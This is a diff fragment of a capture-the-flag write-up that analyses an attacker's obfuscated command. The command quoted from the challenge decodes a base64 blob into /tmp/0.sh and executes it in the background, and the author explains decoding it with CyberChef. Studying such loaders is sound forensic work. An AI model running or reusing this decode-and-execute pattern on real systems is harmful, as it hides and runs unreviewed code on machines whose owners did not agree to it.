heathbar019/Writeups/2025-06-14-DoD-Cyber-Sentinel-Challenge/for_remote_help.md

 `sudo echo IyEvYmluL2Jhc2gKCiRsb2c9Ii90bXAvbG9nXyQoZGF0ZSArIiVZLSVtLSVkLS0lSC0lTSIpIgokdGd6PSI ...
 AvaW5mby5zaAovYmluL2Jhc2ggL3RtcC9pbmZvLnNoCnJtIC1mIC90bXAvaW5mby5zaAo= | base64 -d >> /tmp/0.sh && chmod +x /tmp/0.sh && /bin/bash /tmp/0.sh &`

-Here we go, this seems to be yet another bash script obfuscated in base64 being saved and executed.
+Here we go, this seems to be yet another bash script - now obfuscated in base64 - being saved and executed.
 We can simply throw this in to the browser tool CyberChef, it will automatically detect base64, and decode it for us:

 ![image](https://github.com/user-attachments/assets/a6de7c73-fddb-4038-a09d-e87336d19171)